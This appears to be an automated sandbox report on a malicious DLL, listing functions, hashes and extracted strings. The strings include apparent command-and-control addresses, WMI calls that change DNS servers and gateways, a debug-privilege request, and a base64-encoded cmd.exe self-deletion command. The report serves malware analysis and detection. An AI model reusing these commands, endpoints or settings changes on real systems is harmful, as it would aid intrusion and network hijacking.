                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                                                          • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=$p=Vu
                                                                                                                                                                          • API String ID: 2640012081-1190809373
                                                                                                                                                                          • Opcode ID: 79137d61cba49b853a1e0c6cf19b6010acc63f4405b1c2f6576b3498c337d283
                                                                                                                                                                          • Instruction ID: 9ca97b7ebb433752ffed003b4f688b974b795f87ac827d3fa99277f148b18eb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 79137d61cba49b853a1e0c6cf19b6010acc63f4405b1c2f6576b3498c337d283
                                                                                                                                                                          • Instruction Fuzzy Hash: EDD16074D00219EFEB15CFA4C8809EEBBB5FF04781F204419F419AB259DB75AA45CFA1
                                                                                                                                                                          Function 100053C9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 227sleepfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 10005581
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054BB
                                                                                                                                                                          • %s\%s, xrefs: 10005443
                                                                                                                                                                          • c:\windows\system32\drivers\%s, xrefs: 100054AA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: rand$wsprintf$FilePrintSleep
                                                                                                                                                                          • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
                                                                                                                                                                          • API String ID: 2577056782-455112146
                                                                                                                                                                          • Opcode ID: 67512bb8040b031426eaab9b4334ec40ff00c545cd59c41cf9516fa560dd9287
                                                                                                                                                                          • Instruction ID: 707e71cc3576b89c72abdeb88e14083c0e5233f75fe593892cbd880b6aeee3b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 67512bb8040b031426eaab9b4334ec40ff00c545cd59c41cf9516fa560dd9287
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C61F973A00258BFEB14DB64CC46FEB77AEEB84351F144466FA049B1D0DB76EA848A50
                                                                                                                                                                          Function 1000599B Relevance: 25.6, APIs: 4, Strings: 13, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wsprintf
                                                                                                                                                                          • String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12091507$12091507$C:\Users\user\Desktop$C:\Users\user\Desktop\12091507$C:\Users\user\Desktop\2JSGOlbNym.dll$C:\Users\user\Desktop\version.txt$C:\Windows\SysWOW64\rundll32.exe$ECF4BB45F69F$M%s$M107.163.56.251:6658
                                                                                                                                                                          • API String ID: 2111968516-22818032
                                                                                                                                                                          • Opcode ID: 7cbfd82683c9c081f3a982ca76c3b6eece48747b5586e8c6d2748a7453c162e6
                                                                                                                                                                          • Instruction ID: 2c0e65cf9d0f003dd0541039253934f55528cad486157ddc35f7c3791a233049
                                                                                                                                                                          • Opcode Fuzzy Hash: 7cbfd82683c9c081f3a982ca76c3b6eece48747b5586e8c6d2748a7453c162e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C1127756007587BF210E7619C85F5F7E5CDF896EAF01012AF6049E181DB76EC808672
                                                                                                                                                                          Function 10004D48 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 306COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004ED7
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004EDD
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10004EE3
                                                                                                                                                                          • VariantInit.OLEAUT32(?,?,?,00000000,?,?,?,?,?,?,?,10016AF0,00000000,00080000), ref: 10005021
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$p=Vu$svchost.exe$svchost.exe -k NetworkService
                                                                                                                                                                          • API String ID: 1927566239-3240772352
                                                                                                                                                                          • Opcode ID: 98dcacb95cbd717f680043640c997e590893addb6ec040face789dea5994894a
                                                                                                                                                                          • Instruction ID: 9d9a7b9c9ad05fb17601a1e21a41dbb997ac73afb50a28aca2ce94161bb16792
                                                                                                                                                                          • Opcode Fuzzy Hash: 98dcacb95cbd717f680043640c997e590893addb6ec040face789dea5994894a
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA14AB5900209AFEB04DFA4CC81DEEBBB8FF48394F104569F515AB294CB31AE45CB60
                                                                                                                                                                          Function 10005D09 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00000000,10005CA4,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00080000,00000000), ref: 10003F76
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                                                          • String ID: %s\lang.ini$C:\Users\user\Desktop$http://$search
                                                                                                                                                                          • API String ID: 1721638100-4171480768
                                                                                                                                                                          • Opcode ID: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
                                                                                                                                                                          • Instruction ID: 870dc5a9e8937f5dec60cb765e1a8b9b6c263c42da1418f367658ae9c7f1e2c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 491106769081197BFB61DAA4CC42FDB776CDB043D5F0045B2FB44A5091EA72EFC48660
                                                                                                                                                                          Function 1002B195 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 59sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          • SeDebugPrivilege, xrefs: 10034413
                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 1000882E
                                                                                                                                                                          • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: C:\Users\user\Desktop$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-3528884915
                                                                                                                                                                          • Opcode ID: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
                                                                                                                                                                          • Instruction ID: eef6782f7c8bf8d562aff317d79cc2e303554eab770f54d6d404826304d9c596
                                                                                                                                                                          • Opcode Fuzzy Hash: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
                                                                                                                                                                          • Instruction Fuzzy Hash: C611E3B4004245BFE702DF10DC81AAE7BA8FF44384F40886DF6856A241CBB1AAD48B56
                                                                                                                                                                          Function 10005C5E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00000000,10005CA4,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00080000,00000000), ref: 10003F76
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CC8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                                                          • String ID: %s\lang.ini$C:\Users\user\Desktop$http://
                                                                                                                                                                          • API String ID: 1721638100-2270416971
                                                                                                                                                                          • Opcode ID: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction ID: 57a004b8a41de6ea14946d18f863adaefc4c4a039aa1cd5e98ec9af79828a04e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction Fuzzy Hash: FF11047690411C7EFB21DAA4CC42FDB7B6CDB04398F0045B1FB44B6081EA71AF844660
                                                                                                                                                                          Function 100080A9 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 117sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID: 107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$P
                                                                                                                                                                          • API String ID: 3472027048-2873435839
                                                                                                                                                                          • Opcode ID: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
                                                                                                                                                                          • Instruction ID: 06cf6e753789beb41ee34e7b66c8b6e5b7de97640241e5e5236da3cdb21958a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2831867790425D6EEB11D7B4DC41BDA7B7CFF18350F5404E6E248E6182EB719B988B10
                                                                                                                                                                          Function 10004642 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wsprintf
                                                                                                                                                                          • String ID: %s\%s$.$\*.*
                                                                                                                                                                          • API String ID: 2111968516-2210278135
                                                                                                                                                                          • Opcode ID: a6effb536eca214d7256199a0a198b34f123812134fbf0658ca86594e8f67df4
                                                                                                                                                                          • Instruction ID: 788f7299f4ef3f0d15df8f53932c811205ff60b6d2b73f04fca062f583e9a503
                                                                                                                                                                          • Opcode Fuzzy Hash: a6effb536eca214d7256199a0a198b34f123812134fbf0658ca86594e8f67df4
                                                                                                                                                                          • Instruction Fuzzy Hash: 59316FB6C0025CBEEF12DBA4CD46ECEBB79EF04380F1005E6F618A6051DB719B989B50
                                                                                                                                                                          Function 1002AEDC Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 51sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 1000882E
                                                                                                                                                                          • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-2405328761
